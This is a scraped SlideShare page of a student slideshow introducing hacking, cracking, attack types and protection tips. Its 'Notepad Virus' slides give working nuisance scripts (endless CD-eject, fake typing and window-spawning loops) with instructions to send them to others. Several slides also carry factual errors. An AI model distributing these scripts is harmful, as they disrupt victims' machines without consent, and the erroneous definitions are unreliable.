SlideShare a Scribd company logo
1 of 37
Download to read offline
Introduction of Hacking and
Cracking
Prepared By :- Harshil Barot
Department Of Computer
Science,H.N.G.University,Patan,Gujarat.(In
dia)
WHAT IS HACKING ?
Hacking is the act of penetrating a closed computer
system for the knowledge and information that is
contained within. Through the study of technology
and computers a hacker can open his mind and
expand his knowledge.
LEVELS OF HACKERS
•High-level hackers
High-level hackers are sophisticated users with large knowledge of
technology.
•Low-level hackers
Low-level hackers are “Foot Soldiers” who marks programs with little
understanding of how they worked. Unfortunately hackers also gain the access
of CERT (Computer Emergency Response Time).
Hacker is someone with deep understanding of computers and/or
networking.Art of hacking can be with positive or negative intensions
WHO IS HACKER?
 HACKER IS NOT CYBER CRIMINAL BUT HE
IS THEVERY INTELLIGENT PERSON WHO IS
USE HIS KNOWLEDGE IN CONSTRUCTIVE
MANNER TO SECURE SYSTEM & NEVER
DAMAGE DATA
 HE KNOW ALL ABOUT THE OPERATING
SYSTEM & DIFFERENT HOLES IN THE
SYSTEM
WHO IS CRACKER?
 PERSON WHO ENTER INTO OTHER’S
SYSTEM ANDVIOLET THE SYSTEM,DAMAGE
THE DATA,CREATE HAVOC IS CALLED
CRACKER
 CRACKER IS CYBER CRIMINAL
 THEY CAN BE EASILY IDENTIFIED BECAUSE
THEIR ACTIONS ARE MALICIOUS
1 . Hacking - showing computer expertise.
Unauthorized use of computer and network resources
2 . Cracking - breaking security on software or systems
3 . Phreaking - cracking telecom networks(Telephone
Hacking)
4 . Spoofing(Phishing) - faking the originating IP address
in a datagram
History Of Hacking :-
 1969 - Unix ‘hacked’ together
 1971 - Cap ‘n Crunch phone exploit discovered
 1988 - Morris Internet worm crashes 6,000 servers
 1994 - $10 million transferred from CitiBank accounts
 1995 - Kevin Mitnick sentenced to 5 years in jail
 2000 - Major websites succumb to DDoS( distributed denial-of-
service)
 2000 - 15,700 credit and debit card numbers stolen fromWestern Union
(hacked while web database was undergoing maintenance)
 2001 Code Red
◦ exploited bug in MS IIS to penetrate & spread
◦ probes random IPs for systems running IIS
◦ had trigger time for denial-of-service attack
◦ 2nd wave infected 360000 servers in 14 hours
 Code Red 2 - had backdoor installed to allow remote control
 Nimda -used multiple infection mechanisms email, shares, web client, IIS
 2002 – SlammerWorm brings web to its knees by attacking MS SQL
Server
Types Of Hacker
1.White Hat hacker :- breaks security for security
perpose
2.Black hat Hacker : -break security for
unauthorised use
3.Grey hat hacker :- Com. of white hat and black hat.
They may offer to repaire the system.
4.Blue Hat hacker :- someone outside computer
security
who use the system
5.script kiddie :- Mostly student. Use tools created
by black hats
THE PROCESS OF HACKING
Some common steps that hackers have to follow r as follows :-
•Footprinting
Before the real fun begins for hackers, the three essentials steps must be
performed. Firstly , the hackers creates a profile of the company’s security posture.
This is known as footprinting .
Scanning
The second step is that of scanning in which the hacker tests each target system
to see if it is alive or not.
•Enumeration
Next, the hacker will try to identify valid user accounts and poorly protected
resource shares, using enumeration process.
•Gaining Access
For target systems running Windows, hackers can guess passwords for
enumerated user names, using an automatic tool and a list of passwords to try,
and can be successful if a strong password policy is not followed and account
lockouts r not implemented .
•Tracks Covered
Tracks can be disabled and then enabled by clearing the event log.
•Backdoors
There is a keystroke logger , which is between the OS and keyboard hardware and
records every keystroke. On tracing its output hackers can easily identify what
steps have done before and thus can identify the username and password
Why do hackers hack?
JUST FOR FUN
SHOW OFF
HACK OTHER SYSTEMS SECRETLY
NOTIFY MANY PEOPLETHEIRTHOUGHT
STEAL IMPORTANT INFORMATION
DESTROY ENEMY’S COMPUTER NETWORK DURINGTHE
WAR
What do hackers do after hacking?(2)
INSTALL IRC RELATED PROGRAM
identd, irc, bitchx, eggdrop, bnc
INSTALL SCANNER PROGRAM
mscan, sscan, nmap
INSTALL EXPLOIT PROGRAM
INSTALL DENIAL OF SERVICE PROGRAM
USE ALL OF INSTALLED PROGRAMS SILENTLY
What do hackers know?
DON’T KNOW HOWTO USEVI
DON’T KNOWWHAT UNIX IS
DON’T KNOWWHAT THEY DO
KNOW HOWTO INTRUDETHE SYSTEM
KNOW HOWTO CRASHTHE SYSTEM
KNOWWHERETHE HACKING
PROGRAMSARE
How can kid hack?
KID HAS MUCH OFTIME
Kid can search for longer time than other
people
ALL HACKING PROGRAM IS EASYTO
USE
KID DOESN’T HAVETO KNOW HOW
THE HACKING PROGRAMWORKS
THESE KIDS ARE CALLED SCRIPT
KIDDIES
How can be a real hacker?
STUDY C/C++/ASSEMBLYLANGUAGE
STUDY COMPUTERARCHITECTURE
STUDY OPERATING SYSTEM
STUDY COMPUTER NETWORK
EXAMINETHE HACKINGTOOLS FOR A MONTH
THINKTHE PROBLEM OFTHE COMPUTER
Why can’t defend against hackers?
THERE ARE MANY UNKNOWN SECURITY HOLE
HACKERS NEEDTO KNOW ONLY ONE
SECURITY HOLETO HACKTHE SYSTEM
ADMIN NEEDTO KNOWALL SECURITY HOLES
TO DEFENDTHE SYSTEM
What should do after hacked?
SHUTDOWNTHE SYSTEM
Or turn off the system
SEPARATETHE SYSTEM FROM NETWORK
RESTORETHE SYSTEM WITHTHE BACKUP
Or reinstall all programs
CONNECTTHE SYSTEM TOTHE NETWORK
IT CAN BE GOODTO CALLTHE POLICE
How to translate the hackers’ language (1)
1 -> i or l
3 -> e
4 -> a
7 -> t
9 -> g
0 -> o
$ -> s
| -> i or l
|| -> n
|/| -> m
s -> z
z -> s
f -> ph
ph -> f
x -> ck
ck -> x
How to translate the hackers’
language (2)
 Ex)
◦ 1 d1d n0t h4ck th1s p4g3, 1t w4s l1k3 th1s
wh3n 1 h4ck3d 1n
◦ I did not hack this page, it was like this when I
hacked in
Protect your Computers!
 Use anti-virus software and
firewalls - keep them up to date
 Keep your operating system up to
date with critical security updates
and patches
 Don't open emails or attachments
from unknown sources
 Use hard-to-guess passwords.
Don’t use words found in a
dictionary. Remember that
password cracking tools exist
 Back-up your computer data on
disks or CDs often
 Don't share access to your
computers with strangers
 If you have a wi-fi network,
password protect it
 Disconnect from the Internet
when not in use
 Reevaluate your security on a
regular basis
 Make sure your employees and
family members know this info
too!
 Over the Internet
 Over LAN
 Locally
 Offline
 Theft
 Deception
Modes of Hacker Attack
 Because they can
◦ A large fraction of hacker attacks have been pranks
 Financial Gain
 Espionage
 Venting anger at a company or organization
 Terrorism
Why do Hackers Attack?
 Active Attacks
◦ Denial of Service
◦ Breaking into a site
 Intelligence Gathering
 Resource Usage
 Deception
 Passive Attacks
◦ Sniffing
 Passwords
 Network Traffic
 Sensitive Information
◦ Information Gathering
Types of Hacker Attack
Definition:
An attacker alters his identity so that some one thinks he
is some one else
◦ Email, User ID, IP Address, …
◦ Attacker exploits trust relation between user and
networked machines to gain access to machines
Types of Spoofing:
1. IP Spoofing:
2. Email Spoofing
3. Web Spoofing
Spoofing
 A hacker can exploit a weak passwords & uncontrolled
network modems easily
 Steps
◦ Hacker gets the phone number of a company
◦ Hacker runs war dialer program
 If original number is 555-5532 he runs all numbers in the 555-55xx
range
 When modem answers he records the phone number of modem
◦ Hacker now needs a user id and password to enter
company network
 Companies often have default accounts e.g.temp, anonymous with no
password
 Often the root accountuses company name as the password
 For strong passwords password cracking techniques exist
Password Attacks
Password Attacks
 Two kinds: Password Guessing and Password
Cracking
 Password Guessing:Attempt to guess the
password for a particular user ID.This process
is rarely successful, time consuming, and
generates a lot of network traffic. Also, some
accounts are locked out after a set number of
unsuccessful guesses. Many password-guessing
tools can be found at Packet Site:
Common scenarios in Cyber Crime
Unauthorized access: This occurs when a user/hacker deliberately gets access
into someone else’s network either to monitor or data destruction purposes
Denial of service attack: It involves sending of disproportionate demands or
data to the victims server beyond the limit that the server is capable to handle and
hence causes the server to crash
Virus, Worms and Trojan attacks: Viruses are basically programs that are
attached to a file which then gets circulated to other files and gradually to other
computers in the network. Worms unlike Viruses do not need a host for
attachments they make copies of themselves and do this repeatedly hence eating
up all the memory of the computer. Trojans are unauthorized programs which
functions from inside what seems to be an authorized program, thereby concealing
what it is actually doing.
Email Bombing It refers to sending a large number of emails to
the victim resulting in the victim's email account (in case of an
individual) or mail servers (in case of a company or an email service
provider) crashing
Internet Time Thefts This connotes the usage by an
unauthorized person of the Internet hours paid for by another.
Web Jacking This occurs when someone forcefully takes control of a website (by
cracking the password and later changing it). The actual owner of the website does
not have any more control over what appears on that website
Theft and Physical damage of computer or its peripherals This type of
offence involves the theft of a computer, some parts of a computer or a peripheral
attached to the computer. and physically damaging a computer or its peripherals
Thinkbefore you Click
IP ADDRESS
IP ADDRESS ISTHE ADDRESS OFYOUR
COMPUTER INTHE INTERNET
IT IS UNIQ
LIKE 192.168.23.45
Passive Sniffing
login:
devesh
passwd:
india123
SNIFFER
In Hub Networks
ARP Cache Poisoning
IP -> 192.168.51.36
MAC -> 00:00:00:BB:BB:BB
Internal ARP Cache
192.168.51.35 – 00:00:00:CC:CC:CC
System B
IP -> 192.168.51.35
MAC -> 00:00:00:AA:AA:AA
Internal ARP Cache
192.168.51.36 – 00:00:00:CC:CC:CC
System A
IP -> 192.168.51.37
MAC -> 00:00:00:CC:CC:CC
Internal ARP Cache
192.168.51.36 – 00:00:00:BB:BB:BB
192.168.51.35 – 00:00:00:AA:AA:AA
Attacker
192.168.51.36 is at
00:00:00:CC:CC:CC 192.168.51.35 is at
00:00:00:CC:CC:CC
Knowing IP addresses
 IP address is a
unique web address
for each computer
connected to
internet
 Knowing this is
essential before
anything else
Symptoms
 Targeted Pop-ups
 Slow Connection
 Targeted E-Mail (Spam)
 UnauthorizedAccess
 Spam Relaying
 System Crash
 Program Customisation
SPYWARE
SPYWARE / TROJAN
SPYWARE
TROJAN HORSE
TROJAN HORSE
SPYWARE/ TROJAN
SPYWARE
32
Small NotepadVirus :-
More Notepad Viruses
1)Continually pop out your friend's CD Drive.
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as "Anything.VBS" and send it.
Hack Computer keyboard and make him type “Keyboard not working"
simultaneously:
Set wshShell =
wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys“Keyboard not working"
loop
Save it as "Anything.VBS" and send it.
Open Notepad continually in your computer
@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top
Save it as “Anything.BAT" and send it.
LIST OF SITES THAT WERE HACKED
•-Monmouth Army Base --- http://www.monmouth.army.mil/
•-US Army --- http://www4.army.mil/
•-The Jerry Springer Show --- http://www.jerryspringer.com/
•-Symantec Corporation --- http://www.symantec.com/
•-U.S. Department of Commerce Institute for Telecommunication
Sciences --- http://elbert.its.bldrdoc.gov/
•-Technical University of Denmark --- http://lanpc11.ilf.dtu.dk
•Illinois Natural History Survey --- http://nuclear.hazard.uiuc.edu
• Monica Lewinsky's site ---http://www.monicalewinsky.com/
•Phoenix Data Systems ---http://www.phoenixds.at/
•Ruchi Group ---http://www.ruchigroup.com/
•Concept Reseau ---http://www.concept-reseau.fr/
•Wayne University US Department ---http://www.us.wayne.edu/

More Related Content

What's hot

Introduction to Cyber Crime
Introduction to Cyber CrimeIntroduction to Cyber Crime
Introduction to Cyber CrimeDr Raghu Khimani
 
Inetsecurity.in Ethical Hacking presentation
Inetsecurity.in Ethical Hacking presentationInetsecurity.in Ethical Hacking presentation
Inetsecurity.in Ethical Hacking presentationJoshua Prince
 
Introduction to ethical hacking
Introduction to ethical hackingIntroduction to ethical hacking
Introduction to ethical hackingankit sarode
 
Email Security : PGP & SMIME
Email Security : PGP & SMIMEEmail Security : PGP & SMIME
Email Security : PGP & SMIMERohit Soni
 
Ethical hacking Chapter 7 - Enumeration - Eric Vanderburg
Ethical hacking   Chapter 7 - Enumeration - Eric VanderburgEthical hacking   Chapter 7 - Enumeration - Eric Vanderburg
Ethical hacking Chapter 7 - Enumeration - Eric VanderburgEric Vanderburg
 
Presentation on Ethical Hacking ppt
Presentation on Ethical Hacking pptPresentation on Ethical Hacking ppt
Presentation on Ethical Hacking pptShravan Sanidhya
 
Full seminar report on ethical hacking
Full seminar report on ethical hackingFull seminar report on ethical hacking
Full seminar report on ethical hackingGeorgekutty Francis
 
Cyber crime and its types
Cyber crime and its  typesCyber crime and its  types
Cyber crime and its typesDINESH KAMBLE
 
Malicious Url Detection Using Machine Learning
Malicious Url Detection Using Machine LearningMalicious Url Detection Using Machine Learning
Malicious Url Detection Using Machine Learningsecurityxploded
 
Cyber crime and issues
Cyber crime and issuesCyber crime and issues
Cyber crime and issuesRoshan Mastana
 
PHISHING PROJECT REPORT
PHISHING PROJECT REPORTPHISHING PROJECT REPORT
PHISHING PROJECT REPORTvineetkathan
 
Email investigation
Email investigationEmail investigation
Email investigationAnimesh Shaw
 

What's hot (20)

Introduction to Cyber Crime
Introduction to Cyber CrimeIntroduction to Cyber Crime
Introduction to Cyber Crime
 
Haking PPT
Haking PPTHaking PPT
Haking PPT
 
Inetsecurity.in Ethical Hacking presentation
Inetsecurity.in Ethical Hacking presentationInetsecurity.in Ethical Hacking presentation
Inetsecurity.in Ethical Hacking presentation
 
Introduction to ethical hacking
Introduction to ethical hackingIntroduction to ethical hacking
Introduction to ethical hacking
 
Email Security : PGP & SMIME
Email Security : PGP & SMIMEEmail Security : PGP & SMIME
Email Security : PGP & SMIME
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Ethical hacking Chapter 7 - Enumeration - Eric Vanderburg
Ethical hacking   Chapter 7 - Enumeration - Eric VanderburgEthical hacking   Chapter 7 - Enumeration - Eric Vanderburg
Ethical hacking Chapter 7 - Enumeration - Eric Vanderburg
 
Presentation on Ethical Hacking ppt
Presentation on Ethical Hacking pptPresentation on Ethical Hacking ppt
Presentation on Ethical Hacking ppt
 
Full seminar report on ethical hacking
Full seminar report on ethical hackingFull seminar report on ethical hacking
Full seminar report on ethical hacking
 
Hacking
HackingHacking
Hacking
 
cyber stalking
cyber stalking cyber stalking
cyber stalking
 
Ethical hacking presentation
Ethical hacking presentationEthical hacking presentation
Ethical hacking presentation
 
Cyber crime and its types
Cyber crime and its  typesCyber crime and its  types
Cyber crime and its types
 
Malicious Url Detection Using Machine Learning
Malicious Url Detection Using Machine LearningMalicious Url Detection Using Machine Learning
Malicious Url Detection Using Machine Learning
 
Reconnaissance
ReconnaissanceReconnaissance
Reconnaissance
 
Cyber crime and issues
Cyber crime and issuesCyber crime and issues
Cyber crime and issues
 
PHISHING PROJECT REPORT
PHISHING PROJECT REPORTPHISHING PROJECT REPORT
PHISHING PROJECT REPORT
 
Email investigation
Email investigationEmail investigation
Email investigation
 

Similar to Introduction of hacking and cracking

Cyper security & Ethical hacking
Cyper security & Ethical hackingCyper security & Ethical hacking
Cyper security & Ethical hackingCmano Kar
 
Learn Hacking With Gflixacademy
Learn Hacking With GflixacademyLearn Hacking With Gflixacademy
Learn Hacking With GflixacademyGaurav Mishra
 
Ehical Hacking: Unit no. 1 Information and Network Security
Ehical Hacking: Unit no. 1 Information and Network SecurityEhical Hacking: Unit no. 1 Information and Network Security
Ehical Hacking: Unit no. 1 Information and Network Securityprachi67
 
Hacking- Ethical/ Non-ethical, Cyber Security.
Hacking- Ethical/ Non-ethical, Cyber Security.Hacking- Ethical/ Non-ethical, Cyber Security.
Hacking- Ethical/ Non-ethical, Cyber Security.JasminJaman1
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Securitybelsis
 
Introduction to Ethical Hacking (Basics)
Introduction to Ethical Hacking (Basics)Introduction to Ethical Hacking (Basics)
Introduction to Ethical Hacking (Basics)Sumit Satam
 
Parag presentation on ethical hacking
Parag presentation on ethical hackingParag presentation on ethical hacking
Parag presentation on ethical hackingparag101
 
Seucrity in a nutshell
Seucrity in a nutshellSeucrity in a nutshell
Seucrity in a nutshellYahia Kandeel
 
Chapter 2 konsep dasar keamanan
Chapter 2 konsep dasar keamananChapter 2 konsep dasar keamanan
Chapter 2 konsep dasar keamanannewbie2019
 
Computer Security Presentation
Computer Security PresentationComputer Security Presentation
Computer Security PresentationPraphullaShrestha1
 
IRJET- Study of Hacking and Ethical Hacking
IRJET- Study of Hacking and Ethical HackingIRJET- Study of Hacking and Ethical Hacking
IRJET- Study of Hacking and Ethical HackingIRJET Journal
 

Similar to Introduction of hacking and cracking (20)

Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Cyper security & Ethical hacking
Cyper security & Ethical hackingCyper security & Ethical hacking
Cyper security & Ethical hacking
 
Learn Hacking With Gflixacademy
Learn Hacking With GflixacademyLearn Hacking With Gflixacademy
Learn Hacking With Gflixacademy
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Ehical Hacking: Unit no. 1 Information and Network Security
Ehical Hacking: Unit no. 1 Information and Network SecurityEhical Hacking: Unit no. 1 Information and Network Security
Ehical Hacking: Unit no. 1 Information and Network Security
 
Hacking by Pratyush Gupta
Hacking by Pratyush GuptaHacking by Pratyush Gupta
Hacking by Pratyush Gupta
 
E Commerce security
E Commerce securityE Commerce security
E Commerce security
 
Hacking- Ethical/ Non-ethical, Cyber Security.
Hacking- Ethical/ Non-ethical, Cyber Security.Hacking- Ethical/ Non-ethical, Cyber Security.
Hacking- Ethical/ Non-ethical, Cyber Security.
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Security
 
How to hack or what is ethical hacking
How to hack or what is ethical hackingHow to hack or what is ethical hacking
How to hack or what is ethical hacking
 
Introduction to Ethical Hacking (Basics)
Introduction to Ethical Hacking (Basics)Introduction to Ethical Hacking (Basics)
Introduction to Ethical Hacking (Basics)
 
Parag presentation on ethical hacking
Parag presentation on ethical hackingParag presentation on ethical hacking
Parag presentation on ethical hacking
 
Cyber Security Fundamentals
Cyber Security FundamentalsCyber Security Fundamentals
Cyber Security Fundamentals
 
Hacking intro
Hacking introHacking intro
Hacking intro
 
Seucrity in a nutshell
Seucrity in a nutshellSeucrity in a nutshell
Seucrity in a nutshell
 
Chapter 2 konsep dasar keamanan
Chapter 2 konsep dasar keamananChapter 2 konsep dasar keamanan
Chapter 2 konsep dasar keamanan
 
Computer Security Presentation
Computer Security PresentationComputer Security Presentation
Computer Security Presentation
 
Ethical Hacking.pptx
Ethical Hacking.pptxEthical Hacking.pptx
Ethical Hacking.pptx
 
IRJET- Study of Hacking and Ethical Hacking
IRJET- Study of Hacking and Ethical HackingIRJET- Study of Hacking and Ethical Hacking
IRJET- Study of Hacking and Ethical Hacking
 
Chapter 10.0
Chapter 10.0Chapter 10.0
Chapter 10.0
 

Recently uploaded

Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodJuan lago vázquez
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsRoshan Dwivedi
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 

Recently uploaded (20)

Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 

Introduction of hacking and cracking

  • 1. Introduction of Hacking and Cracking Prepared By :- Harshil Barot Department Of Computer Science,H.N.G.University,Patan,Gujarat.(In dia)
  • 2. WHAT IS HACKING ? Hacking is the act of penetrating a closed computer system for the knowledge and information that is contained within. Through the study of technology and computers a hacker can open his mind and expand his knowledge. LEVELS OF HACKERS •High-level hackers High-level hackers are sophisticated users with large knowledge of technology. •Low-level hackers Low-level hackers are “Foot Soldiers” who marks programs with little understanding of how they worked. Unfortunately hackers also gain the access of CERT (Computer Emergency Response Time). Hacker is someone with deep understanding of computers and/or networking.Art of hacking can be with positive or negative intensions
  • 3. WHO IS HACKER?  HACKER IS NOT CYBER CRIMINAL BUT HE IS THEVERY INTELLIGENT PERSON WHO IS USE HIS KNOWLEDGE IN CONSTRUCTIVE MANNER TO SECURE SYSTEM & NEVER DAMAGE DATA  HE KNOW ALL ABOUT THE OPERATING SYSTEM & DIFFERENT HOLES IN THE SYSTEM
  • 4. WHO IS CRACKER?  PERSON WHO ENTER INTO OTHER’S SYSTEM ANDVIOLET THE SYSTEM,DAMAGE THE DATA,CREATE HAVOC IS CALLED CRACKER  CRACKER IS CYBER CRIMINAL  THEY CAN BE EASILY IDENTIFIED BECAUSE THEIR ACTIONS ARE MALICIOUS
  • 5. 1 . Hacking - showing computer expertise. Unauthorized use of computer and network resources 2 . Cracking - breaking security on software or systems 3 . Phreaking - cracking telecom networks(Telephone Hacking) 4 . Spoofing(Phishing) - faking the originating IP address in a datagram
